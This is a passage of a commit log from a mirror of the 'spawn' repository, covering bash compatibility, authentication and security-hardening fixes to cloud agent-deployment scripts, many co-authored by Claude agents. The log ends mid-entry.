spawn

vrr/spawn

mirror of https://github.com/OpenRouterTeam/spawn.git synced 2026-05-07 00:50:52 +00:00

Author	SHA1	Message	Date
A	3db19d90ac	fix: accept comma in Fly.io macaroon tokens & handle flat org dict (#1593 ) Real `fly auth token` returns comma-separated multi-segment macaroon tokens (fm2_...,fm2_...,fo1_...). The token validation regex rejected commas, forcing re-auth on every run. Add comma to the allowed charset. `fly orgs list --json` returns a flat dict ({"slug": "Name"}) on some flyctl versions, not the list/nodes format the parser expected. Detect and handle both formats so the org picker works correctly. Co-authored-by: lab <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>	2026-02-21 08:20:48 -08:00
A	ed9501235b	fix: bash 3.2 compat — sed for pattern sub + split local var=$(cmd) (#1572 , #1571 ) (#1587 ) Issue #1572: Replace bash 4+ ${//} pattern substitution in generate_env_config with sed for macOS bash 3.2 compatibility. Issue #1571: Split local var=$(cmd) declarations in fly/lib/common.sh so exit codes propagate correctly with set -e on macOS bash 3.2. Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-21 07:49:17 -08:00
A	ce8b1afdf8	fix: always rm temp env file even if .zshrc append fails (#1573 ) (#1586 ) Use semicolons instead of && for rm in inject_env_vars, inject_env_vars_sprite, inject_env_vars_cb, and inject_env_vars_cloud so the temp file containing the API key is always deleted even if ~/.zshrc doesn't exist or append fails. Agent: security-auditor Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-21 10:45:55 -05:00
L	7f6d99f90f	fix: clear corrupt saved token + capture only first line of fly auth token (#1565 ) Two fixes for persistent Fly.io auth failures: 1. shared/common.sh — _load_token_from_config(): When the saved token fails the security character check, auto-delete the corrupt config file instead of silently returning 1. This prevents the user from being stuck in a loop where every run loads a malformed token (from a previous failed auth attempt) and immediately fails. Message changed from error to warn: "Saved token is malformed — clearing cached credentials." 2. fly/lib/common.sh — _try_flyctl_auth() and _try_fly_browser_auth(): Pipe 'fly auth token' output through 'head -1' to capture only the first line. Newer flyctl versions may print warnings/metadata after the token on subsequent lines; previously these got concatenated into the token string via $() and could introduce characters that fail the security validator (newlines stripped by _sanitize_fly_token, but concatenated text from warning lines could contain unusual chars). Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>	2026-02-21 06:23:35 -08:00
A	25d7bfe027	fix: align key-request.sh token regex with shared/common.sh for FlyV1 tokens (#1562 ) The _try_load_env_var regex in key-request.sh rejected tokens containing spaces, colons, plus signs, or equals signs. This caused FlyV1 prefixed tokens ("FlyV1 fm2_...") to fail validation during QA cycle key loading, making Fly.io always appear as a missing key provider. Updated regex to match _load_token_from_config in shared/common.sh which already allows these characters. Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-21 07:15:34 -05:00
A	184bc21b3a	fix: replace printf -v with export for bash 3.2 compat in key-request.sh (#1561 ) printf -v requires bash 4.0+; macOS ships bash 3.2, causing _try_load_env_var() to fail with 'printf: -v: invalid option' and breaking saved API key loading for all cloud providers. Both var_name and val are validated against strict regexes immediately above, so export "NAME=VALUE" is injection-safe and works on bash 3.2+. The macos-compat linter already flags this pattern as MC013 error. Agent: team-lead Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-21 06:42:14 -05:00
A	907d21f030	fix: allow space in token validation regex for FlyV1 prefixed tokens (#1560 ) The _load_token_from_config regex (added in #1547) rejects tokens containing spaces, but Fly.io browser OAuth tokens are saved with a "FlyV1 " prefix (e.g., "FlyV1 fm2_xxx"). This causes the token to be silently rejected on reload, forcing re-authentication every session. Space is safe inside curl -K double-quoted header values. Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-21 10:48:53 +00:00
A	c1f730c69a	fix: replace eval with declare and add base64 validation (#1557 ) * fix: replace eval with declare and add base64 validation (issues #1554, #1555) - shared/key-request.sh: replace eval with declare for defense-in-depth (eval avoided when safer declare alternative exists; validated vars stay safe) - fly/lib/common.sh: add base64 output alphabet validation before shell interpolation, matching daytona/lib/common.sh proven-safe pattern Fixes #1554 Fixes #1555 Agent: team-lead Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * fix: use printf -v instead of declare for safe variable assignment in key-request.sh Addresses security review feedback on PR #1557. The declare approach created a local variable whose export had no effect outside the function. printf -v assigns directly in the current scope without eval or command substitution. Agent: pr-maintainer Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> --------- Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-21 04:47:33 -05:00
A	9acc239001	fix: validate token characters in _load_token_from_config to prevent curl injection (#1547 ) * fix: validate token characters in _load_token_from_config to prevent curl injection Tokens loaded from ~/.config/spawn/{cloud}.json were exported without character validation. A tampered config file containing a token with embedded newlines could exploit the _curl_api function's -K - (stdin config) mechanism to inject arbitrary curl directives (e.g., output, url), since curl interprets newlines in the config format as directive separators. Add allowlist validation (^[a-zA-Z0-9._/@:-]+$) matching the pattern already used in key-request.sh _try_load_env_var and validate_api_token, making all three token-loading paths consistent. Agent: security-auditor Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * fix: address review feedback on token validation PR - Update backslash test to expect validation failure (backslashes not valid in any known API token format; the old expectation was wrong after validation was added) - Fix test so exit code comes from _load_token_from_config directly, not the trailing echo which always exits 0 - Add comment in shared/common.sh explaining why the pattern includes colon vs key-request.sh pattern (Fly.io FlyV1 tokens use colons) Agent: pr-maintainer Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * fix: address review feedback — widen token charset for base64 segments The original regex rejected + and = which are valid base64 characters found in API tokens (e.g. sk-or-v1-abc/def+ghi==). This caused a pre-existing test to fail. Widen the allowlist to include + and = while keeping the security comment documenting the pattern difference with key-request.sh. Agent: pr-maintainer Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> --------- Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-21 01:18:34 -05:00
L	4ae781d2a8	fix: remove 2>/dev/null from token validation calls in auth flow (#1549 ) Token validation functions (test_hcloud_token, test_do_token, test_daytona_token, _validate_fly_token) contain rich diagnostic log_error/log_warn messages with error details and fix instructions. Calling them with 2>/dev/null silently discarded all that output, leaving users with no explanation when their token was rejected. shared/common.sh — ensure_api_token_with_provider(): Remove 2>/dev/null from "${test_func}" in both the env-var and config-file validation branches, so callers like test_hcloud_token can print API error details and remediation steps. fly/lib/common.sh — ensure_fly_token(): Remove 2>/dev/null from both _validate_fly_token calls (config-file path and post-browser-OAuth path) so users see why validation failed. Note: Issue 1 (API polling in _poll_instance_once) is intentionally left with 2>/dev/null — suppressing curl errors during a 60-iteration polling loop prevents terminal flooding and is handled by '\|\| true'. Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>	2026-02-20 21:27:42 -08:00
A	dce55a3f6c	fix: prevent Python code injection in shared utility functions (#1544 ) Pass field names via sys.argv instead of interpolating bash variables directly into Python source strings in extract_ssh_key_ids() and _load_json_config_fields(). This aligns with the secure pattern already used elsewhere (e.g., _try_load_env_var in key-request.sh). Agent: security-auditor Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-20 23:37:24 -05:00
A	fc87ebf939	fix: replace printf -v (bash 4.0+) with eval for macOS bash 3.2 compat (#1522 ) printf -v was introduced in bash 4.0 but macOS ships bash 3.2. _update_retry_interval() in shared/common.sh used printf -v and is called from generic_ssh_wait and _cloud_api_retry_loop — meaning ALL SSH connectivity checks and cloud API retries would fail on macOS with: "printf: -v: invalid option" Changes: - shared/common.sh: replace printf -v with eval in _update_retry_interval() - shared/common.sh: remove dead code in calculate_retry_backoff() where next_interval was computed but never used - shared/key-request.sh: same printf -v fix - test/macos-compat.sh: add MC013 rule to catch printf -v in future Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-20 10:20:12 -05:00
L	be176e4cdb	fix: confirm kebab resource name + improve Fly.io sandbox auth (#1525 ) shared/common.sh — prompt_spawn_name(): Replace log_info with safe_read so user confirms (or overrides) the derived kebab-case resource name before it's used for any cloud resource: Spawn name (e.g. "My Dev Box"): My Claude Box Resource name [my-claude-box]: ⏎ ← press Enter to accept fly/lib/common.sh — _try_fly_browser_auth(): - Print auth URL prominently on its own line (not just as a warning) so sandbox users can copy-paste it into their local browser - Suppress open_browser errors (\|\| true) so the script doesn't abort if no browser is available - Add explicit sandbox hint while polling - After 120s timeout: offer manual API token entry as a last resort with a direct link to fly.io/dashboard → Tokens Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>	2026-02-20 07:12:49 -08:00
A	3225df305f	fix: hide cloud API tokens from process argument list (#1519 ) Prevent cloud provider API tokens from being visible in ps aux output by passing Authorization headers via curl's -K - (config from stdin) instead of command-line arguments.	2026-02-20 12:51:55 +00:00
Ahmed Abushagur	05f1905294	fix: Daytona SSH gateway — resource overrides, base64 uploads, connection throttling (#1517 ) * fix: Daytona SSH gateway compatibility — resource overrides, base64 uploads, connection throttling Daytona's SSH gateway has several limitations that caused hangs and failures: 1. Resource overrides require image-based creation: Snapshot-based sandboxes reject cpu/memory/disk fields. Use buildInfo.dockerfileContent (FROM image) to switch to image-based creation, which unlocks resource overrides. Default: 2 vCPU, 4 GiB RAM, 30 GiB disk (configurable via env vars). 2. SCP/SFTP not supported: Gateway returns HTTP 404 for SCP subsystem. Upload files via base64-encoded SSH command channel instead. 3. Connection limit (~10-15 per token): Consolidated wait_for_cloud_init from 6 SSH calls into 1. Added 1s sleep between SSH operations to let the gateway release connection slots. 4. Port flag incompatibility: Changed -p PORT to -o Port=PORT so the port works for both ssh and scp (scp interprets -p as preserve timestamps). 5. install_claude_code improvements: Added npm as install method (most reliable for global installs), added .npm-global/bin to PATH. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address security review — escape remote_path, validate image name - upload_file: escape single quotes in remote_path before embedding in the SSH command string (b64 content is inherently safe — base64 alphabet is [A-Za-z0-9+/=] only, no shell metacharacters) - create_sandbox: validate DAYTONA_IMAGE against [a-zA-Z0-9./:_-] to reject malformed image names before sending to the API Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: harden upload_file() — validate base64 + use printf %q for paths Address security review feedback on PR #1517: CRITICAL: Add explicit base64 alphabet validation before embedding encoded content in SSH command string. While base64 output is inherently safe ([A-Za-z0-9+/=]), the validation guards against corrupted/unexpected encoder output. MEDIUM: Replace manual single-quote escaping for remote_path with printf %q, which is the standard shell-safe escaping mechanism and handles all special characters including path traversal attempts. Tests: 110/110 pass, bash -n clean. Agent: pr-maintainer Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> Co-authored-by: B <6723574+louisgv@users.noreply.github.com>	2026-02-20 05:52:39 -05:00
A	32db000ca4	fix: validate env-var tokens and align cloud_authenticate patterns (#1516 ) - ensure_api_token_with_provider now validates env-var tokens with the provider test function, matching config-file token behavior. Previously, stale env-var tokens silently passed auth and failed at server creation with cryptic API errors. - Add prompt_spawn_name to Hetzner and Daytona cloud_authenticate, matching the pattern used by AWS, Fly, GCP, DigitalOcean, and Sprite. Without this, SPAWN_NAME_KEBAB is never set and server name prompts have no pre-filled default on these two providers. - Remove redundant register_cleanup_trap from DigitalOcean cloud_authenticate. shared/common.sh auto-registers the trap at source time (line 3696), making the explicit call dead code. Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-20 04:55:35 -05:00
A	9de4cecfea	fix: add spawn delete hint to post-session summaries (#1515 ) After an SSH/exec session ends, the post-session summary warns users their server is still running and directs them to the cloud dashboard. It never mentions `spawn delete`, the CLI's own deletion command. Add a "spawn delete" hint to both _show_post_session_summary (SSH clouds) and _show_exec_post_session_summary (exec clouds) so users discover the feature at the moment they most need it. Agent: ux-engineer Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-20 04:52:39 -05:00
Ahmed Abushagur	b5d174a472	fix: pin Codex to 0.94.0 + wire_api=chat for multi-turn stability (#1518 ) * fix: switch Codex wire_api from "responses" to "chat" for multi-turn stability The Responses API format causes "Invalid Responses API request" errors on the second turn and beyond — conversation history items round-trip through OpenRouter with null content fields and missing IDs that fail validation. Chat Completions format is fully supported and avoids this issue. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: pin Codex to 0.94.0 + wire_api=chat for multi-turn stability OpenRouter's Responses API proxy drops required fields (id, content) from conversation-history items on multi-turn requests, causing "Invalid Responses API request" at input[6]+. Codex >=0.97.0 removed wire_api=chat support (openai/codex#10157), so we pin to 0.94.0 — the last release where Chat Completions format still works. Tracking: https://github.com/openai/codex/issues/12114 TODO: unpin once OpenRouter /responses handles round-trip correctly. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-20 04:49:35 -05:00
Ahmed Abushagur	95137ed2c7	fix: rewrite hetzner common.sh + fix token prompt bug (#1512 ) * fix: rewrite hetzner common.sh + fix token prompt bug in shared/common.sh Hetzner: rewrote from 621 to 224 lines. Removed hcloud CLI dual-path fallback, server type validation/fallback chain (11 functions), and duplicate CLI+API implementations. Now API-only like DigitalOcean. Shared: fixed echo "" in _prompt_for_api_token, get_openrouter_api_key_manual, and get_openrouter_api_key_oauth writing to stdout instead of stderr. These functions are called inside $(...) command substitutions, so the newlines got prepended to the captured token, causing "unable to authenticate" errors when pasting tokens at the prompt. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: rewrite daytona common.sh — API-only, drop CLI dependency Rewrote from 312 to 174 lines. Removed daytona CLI dependency in favor of direct REST API calls. Matches the same API-only pattern used by Hetzner, DigitalOcean, and other clouds. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: pass SSH port to control master exit in daytona interactive/destroy The ssh -O exit command to close the multiplexed master was missing the -p PORT flag when DAYTONA_SSH_PORT is set. This left the master connection open, causing "mux_client: master did not respond" errors when the interactive session tried to allocate a PTY. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-20 02:52:49 -05:00
L	d5690a8b11	feat: spawn name prompt + kebab resource naming across all clouds (#1507 ) * feat: add spawn name prompt and project confirmation to GCP flow Ask for spawn name upfront (before auth), derive kebab-case default for VM naming, and confirm the current GCP project before using it. New interaction order: 1. Spawn name: "My Dev Box" → kebab "my-dev-box" exported as GCP_INSTANCE_NAME_KEBAB 2. gcloud auth + project confirm: "Current project: X Keep? [Y/n]" If no → project picker shown 3. SSH key 4. Machine type picker (existing) 5. Zone picker (existing) 6. Instance name prompt: "Instance name [my-dev-box]: " User can press Enter to accept or type a custom name New functions: _to_kebab_case() — lowercases, replaces non-alnum with hyphens _gcp_prompt_spawn_name() — prompts for display name, exports kebab default; honours SPAWN_NAME env var set by CLI (--name flag) Modified: _gcp_resolve_project() — adds Y/n confirmation when project already set get_server_name() — shows kebab default in prompt, accepts Enter cloud_authenticate() — calls _gcp_prompt_spawn_name first Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com> * feat: add spawn name prompt to all clouds via shared/common.sh Move _to_kebab_case() and prompt_spawn_name() to shared/common.sh so all clouds get upfront spawn name prompting and kebab-based resource naming. shared/common.sh: + _to_kebab_case() — "My Dev Box" → "my-dev-box" + prompt_spawn_name() — asks for display name, exports SPAWN_NAME_DISPLAY and SPAWN_NAME_KEBAB; skips if already set; honours SPAWN_NAME env var from CLI --name flag ~ get_resource_name() — replaces silent SPAWN_NAME fallback with a visible prefilled default: "Enter server name [my-dev-box]: " Per-cloud changes (cloud_authenticate gains prompt_spawn_name first): hetzner, fly, aws, daytona, digitalocean, sprite — one-line change each gcp/lib/common.sh: - Remove _to_kebab_case() (now in shared) - Remove _gcp_prompt_spawn_name() (now in shared as prompt_spawn_name) ~ cloud_authenticate: _gcp_prompt_spawn_name → prompt_spawn_name ~ get_server_name: simplified back to get_validated_server_name (shared get_resource_name now shows the kebab default in the prompt) Result — every cloud shows this flow upfront: Spawn name (e.g. "My Dev Box"): My Claude Box ℹ Resource name: my-claude-box ... Enter server name [my-claude-box]: ⏎ Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com> * fix: use "Use project '...'?" instead of "Keep this project?" in GCP prompt Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>	2026-02-19 22:22:59 -08:00
L	ff261f3544	feat: add spawn pick to shared _display_and_select (Hetzner + all clouds) (#1505 ) * feat: add spawn pick to _display_and_select in shared/common.sh All clouds using interactive_pick (Hetzner, DigitalOcean, AWS, fly, etc.) now get the arrow-key picker UI when the user runs via `spawn`. Placement: between fzf (rarely installed) and numbered list (plain fallback). Priority: fzf > spawn pick > numbered list. Pipe-delimited items "id\|field2\|field3..." are converted to tab-delimited "id\tid\tfield2 · field3 · ..." so spawn pick displays: > cx22 2 vCPU · 4.0 GB RAM · 40 GB disk · shared · $ 0.0057/hr > fsn1 Falkenstein · DE The --default flag uses default_id when set, otherwise default_value, so the correct item is pre-selected when the picker opens. No 2>/dev/tty redirect (avoids the zsh 'file exists' failure that broke the GCP picker; spawn pick opens /dev/tty internally via fs.openSync). Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com> * refactor: replace custom _gcp_interactive_pick with shared interactive_pick - Remove _gcp_interactive_pick (60 lines of custom picker logic) - Convert option functions to pipe-delimited format (id\|detail) to match what interactive_pick / _display_and_select expect - Replace _gcp_pick_{machine_type,zone,project} with direct interactive_pick calls — same pattern as Hetzner - _gcp_project_options: awk now outputs id\|name instead of id\tid\tname GCP now gets fzf → spawn pick → numbered list for free via the shared helper, with no cloud-specific picker code. Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>	2026-02-19 21:59:00 -08:00
A	34b093fce0	fix: escape control characters in json_escape bash fallback (#1497 ) The json_escape fallback (used when python3 is unavailable) only escaped backslashes and double quotes, producing invalid JSON when input contained newlines, tabs, or carriage returns. This could cause JSON injection in API request bodies sent to cloud providers (Hetzner, DigitalOcean, Fly.io) and corrupt credential config files. Add escaping for \n, \r, and \t in the fallback path. The python3 primary path (json.dumps) was already correct. Agent: security-auditor Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-20 00:05:20 -05:00
A	bb56302c67	fix: correct OAuth code validation regex end-of-string anchor (#1492 ) (#1496 ) Remove backslash before $ in regex pattern so it anchors to end-of-string rather than matching a literal dollar sign. This restores proper validation of OAuth codes (16-128 alphanumeric chars only). Agent: security-auditor Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-19 22:06:31 -05:00
Ahmed Abushagur	0e2750dfd9	fix: persist gh auth credentials for interactive sessions (#1491 ) * fix: persist gh auth credentials to disk for interactive sessions When GITHUB_TOKEN is in the environment, gh auth status returns success (gh checks env vars first), so ensure_gh_auth() short-circuits before gh auth login --with-token writes credentials to ~/.config/gh/hosts.yml. The interactive session starts without GITHUB_TOKEN in env, so gh reports "not logged into any GitHub hosts". Fix: always run gh auth login --with-token when GITHUB_TOKEN is set, persisting credentials to disk regardless of gh auth status. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: unset GITHUB_TOKEN env var before gh auth login --with-token gh refuses to store credentials when GITHUB_TOKEN is already set in the environment: "The value of the GITHUB_TOKEN environment variable is being used for authentication." Save the value, unset the env var, pipe it to gh auth login, then re-export. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address security review — validate token format, skip if already persisted - Add GITHUB_TOKEN format validation (ghp_, gho_, ghu_, ghs_, ghr_, github_pat_) - Add fast path: check gh auth status with env var unset before persisting - Document plaintext credential store behavior (standard gh CLI behavior) Agent: pr-maintainer Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> Co-authored-by: B <6723574+louisgv@users.noreply.github.com>	2026-02-19 19:30:44 -05:00
Ahmed Abushagur	9e2f84adf0	fix: use native OpenRouter model_provider for Codex CLI config (#1490 ) Codex CLI's OPENAI_BASE_URL env var approach causes "Invalid Responses API request" errors because OpenRouter doesn't fully support the Responses API wire format via base URL override. Switch all 8 codex scripts to use ~/.codex/config.toml with model_provider="openrouter" which uses the native OpenRouter integration. Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 18:47:40 -05:00
Ahmed Abushagur	4378db760e	fix: opencode download URL — map x86_64 to x64, drop darwin→mac rename (#1485 ) Release assets use x64 not x86_64 (opencode-linux-x64.tar.gz) and darwin not mac (opencode-darwin-arm64.tar.gz). The arch mapping only handled aarch64→arm64 but missed x86_64→x64, causing 404 on all x86_64 servers. Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 13:52:26 -08:00
Ahmed Abushagur	a063fe61cd	fix: sprite npm PATH resolution and gateway timeout (#1484 ) * fix: sprite npm PATH resolution and gateway timeout Sprites use nvm-managed node, so npm global bin is at /.sprite/languages/node/nvm/.../bin/ which isn't in default PATH. Dynamically resolve $(npm prefix -g)/bin in install, launch, and gateway commands for all sprite agents. Also increase openclaw gateway timeout from 30s to 60s — gateway starts slowly on sprites but TUI connects once ready. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add opencode bin dir to PATH in sprite launch command OpenCode installs to $HOME/.opencode/bin/ which isn't in the sprite's default PATH or the npm prefix path. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 16:49:52 -05:00
Ahmed Abushagur	3b1f87e656	fix: pass -o org flag to all sprite CLI commands (#1479 ) * fix: pass -o org flag to all sprite CLI commands sprite create/exec/list/destroy fail with "authentication failed" when the org isn't passed explicitly. Detect the selected org after login and thread it through all sprite commands via _sprite_org_flags(). Also fix ensure_sprite_authenticated to fail loudly instead of swallowing errors with \|\| true. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: sprite scripts fail when zsh is not available setup_shell_environment overwrites .bashrc with `exec zsh`, but sprites don't have zsh installed. This breaks PATH and causes all agent launch commands that source .zshrc to fail. - Only switch to zsh if it's actually available on the sprite - Replace `source ~/.zshrc` with explicit PATH in all sprite agent launch commands (openclaw, opencode, codex, kilocode) - Fix start_openclaw_gateway to use explicit PATH instead of .zshrc Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: openclaw not found on sprite — bashrc corruption from prior runs On reused sprites, .bashrc still has `exec /usr/bin/zsh -l` from a prior run. Sourcing it in the install command causes `&&` to short-circuit, so `bun install -g openclaw` never runs. - Clean up stale `exec zsh` lines from .bashrc at start of setup_shell_environment (fixes reused sprites) - Use explicit PATH in openclaw install command instead of relying on .bashrc Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use npm instead of bun for openclaw install on sprite bun 1.3.9 on sprites fails with "connection closed" during dependency resolution. Other sprite agents (codex, kilocode) already use npm successfully. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: openclaw install — npm+bun fallback, verify binary exists Try npm first (more reliable on sprites), fall back to bun, then verify the binary is actually in PATH before continuing. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: persist npm global bin path to .spawnrc on sprites npm installs openclaw successfully but its global bin dir isn't in the sprite's default PATH. Detect the npm bin path after install, write it to .spawnrc so gateway and launch commands (which source .spawnrc) find the binary. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 15:47:47 -05:00
A	48d418ccb5	fix: update OpenClaw and OpenCode repository URLs (#1478 ) Point OpenClaw to https://github.com/openclaw/openclaw and OpenCode to https://github.com/anomalyco/opencode. Update the OpenCode install command and binary download URL to match the new repo. Co-authored-by: lab <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>	2026-02-19 11:53:15 -08:00
A	5612cda40b	feat: remove Aider, Goose, Open Interpreter, Gemini CLI, Amazon Q from matrix (#1472 ) These 5 agents are being dropped from the Spawn matrix. This removes 45 agent scripts across 9 clouds, cleans the manifest, test fixtures, READMEs, CLI source, and shared library comments. Co-authored-by: lab <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>	2026-02-19 12:31:00 -05:00
A	2e264d808d	fix: remove duplicate API key calls in spawn_agent + fix OVH server name (#1471 ) PR #1462 removed duplicate get_or_prompt_api_key and get_model_id_interactive calls in spawn_agent(). PR #1468 accidentally re-introduced them with incorrect step numbering (two "4"s and two "5"s). This doubled API validation requests on every deployment across all 130+ agent scripts. Also fix OVH cloud_provision not exporting OVH_SERVER_NAME, causing save_vm_connection to record an empty server name when the user types the name at the interactive prompt instead of passing it via env var. Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-19 12:30:25 -05:00
A	e2d6aa1444	fix: use json_escape in save_vm_connection to prevent malformed JSON (#1470 ) save_vm_connection built JSON via direct string interpolation, which produces malformed output if any value contains quotes, backslashes, or other JSON-special characters. This breaks spawn list/delete/history. Changes: - Use json_escape for all string fields in save_vm_connection - Use json_escape for GCP zone/project metadata values - Switch AWS, GCP, Daytona get_server_name to get_validated_server_name for consistency with Hetzner, DigitalOcean, Fly, OVH Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-19 16:23:27 +00:00
Ahmed Abushagur	8ee54d01a8	fix: harden agent reliability + security across all clouds (#1468 ) * docs: add spawn delete command to README Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: harden openclaw across all clouds — validation, reliability, performance Fixes multiple issues causing openclaw to break on most clouds: Bugs fixed: - Double-prefixed model ID (openrouter/openrouter/auto) in config generation - AWS gateway starting without env vars (missing .zshrc source) - DigitalOcean sourcing .spawnrc instead of .zshrc for gateway - Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p) Validation added: - API key checked against OpenRouter /auth/key endpoint with re-prompt on failure - Model ID verified against OpenRouter model list with re-prompt loop - openrouter/auto and openrouter/free bypass model check Reliability improvements: - Standardized gateway launch with </dev/null & disown across all 9 clouds - Gateway log auto-displayed on startup timeout for diagnostics - 2GB swap added to cloud-init to prevent OOM on small VMs - Portable install timeout (10 min) with macOS gtimeout fallback Performance: - Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s) - Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw - Fly.io: tries bun first (faster), falls back to npm Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: skip sudo in gh install when running as root (Fly.io containers) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id - verify_openrouter_key and verify_openrouter_model skip network calls when SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set - install_agent timeout wrapper now quotes the escaped command for defense in depth - model_id in openclaw JSON now uses json_escape() for consistency Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: remove double-escaping in install_agent that broke shell operators install_agent() was wrapping commands with printf '%q' + bash -c before passing them to the run callback. But run callbacks (run_server, run_sprite, ssh_run_server) already handle escaping for remote transport. The double- escaping turned && \|\| > \| into literal characters, causing 'source' to treat the entire command as a single filename. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use local github-auth.sh instead of curling from main When running from a local checkout, base64-encode the local github-auth.sh and send it inline to the remote machine. This ensures fixes (like the sudo skip for root) take effect immediately without waiting for a merge to main. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: handle github-auth errors gracefully instead of terminating GitHub CLI setup is optional — failures should not abort the spawn session. Guard both run_callback calls in offer_github_auth with \|\| log_warn so the script continues even if gh install fails. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk directly to Google's API. The OpenRouter key is not a valid Google API key, so all requests fail with "API key not valid". Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's endpoint. Fixes all 9 cloud gemini scripts + manifest.json. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: guard optional spawn_agent hooks so failures don't kill the session With set -eo pipefail, any unguarded failure terminates the script. Several optional operations in spawn_agent were unguarded: - agent_configure: config file uploads (agent 